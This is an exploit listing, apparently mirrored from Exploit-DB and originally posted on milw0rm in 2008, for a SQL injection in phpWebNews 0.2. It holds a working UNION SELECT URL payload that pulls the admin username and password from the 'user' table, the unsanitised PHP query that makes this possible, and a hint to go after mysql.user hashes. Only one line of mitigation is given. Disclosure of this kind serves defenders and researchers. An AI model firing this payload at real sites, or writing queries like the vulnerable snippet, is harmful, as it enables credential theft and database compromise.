phpWebNews v0.2 MySQL Edition (Surat kabar/News Management Online) SQL Injection

vendor:

phpWebNews

by:

sToRm

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: phpWebNews

Affected Version From: 0.2

Affected Version To: 0.2

Patch Exists: N/A

Related CWE: N/A

CPE: a:phpwebnews:phpwebnews:0.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

phpWebNews v0.2 MySQL Edition (Surat kabar/News Management Online) SQL Injection

Here, we have a classic SQL MySQL injection. The GET variable 'id_kat' isn't sanitized before being passed to the query. By injecting our string, the query becomes: select * from berita where status='tampil' and kode_kategori=null UNION ALL SELECT 1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13 FROM user-- and isi_berita like %'$m_txt'% order by tgl desc. The comment renders the rest of the query to be useless. We are effectively grabbing the first user from the table 'user', which is the admin. You can inject the other strings with server variables and attempt to fetch mysql.user hashes, if the conditions apply.

Mitigation:

Sanitize user input before passing it to the query.

Source

Exploit-DB raw data:

  ____       _   _       _ ___   __                        _  __
 / ___| ___ | \ | |_   _| | \ \ / /__  _   _ _ __ ___  ___| |/ _| ___  _ __ __ _
| |  _ / _ \|  \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` |
| |_| | (_) | |\  | |_| | | | | | (_) | |_| | |  \__ \  __/ |  _| (_) | | | (_| |
 \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_|  |___/\___|_|_|(_)___/|_|  \__, |
---------------------------------------------------------------------------|___/
Exploit found by sToRm


phpWebNews v0.2 MySQL Edition (Surat kabar/News Management Online)
SQL Injection


SQL Injection
-------------

index.php?id_kat=null+UNION+ALL+SELECT+1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13+FROM+user--


$id_kat=$_GET[id_kat];			  
$m_conn = db_connect();
if ((empty($id_kat))||($id_kat==''))
	$m_sql = "select * from berita where status='tampil' and order by tgl desc";
else
	$m_sql = "select * from berita where status='tampil' and kode_kategori=$id_kat and isi_berita like %'$m_txt'% order by tgl desc";


Here, we have a classic SQL MySQL injection.  The GET variable "id_kat" isn't sanitized before being passed to the query.  By injecting our string, the query becomes:

select * from berita where status='tampil' and kode_kategori=null UNION ALL SELECT 1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13 FROM user-- and isi_berita like %'$m_txt'% order by tgl desc

The comment renders the rest of the query to be useless.  We are effectively grabbing the first user from the table "user", which is the admin.  You can inject the other strings with server variables and attempt to fetch mysql.user hashes, if the conditions apply.

# milw0rm.com [2008-07-03]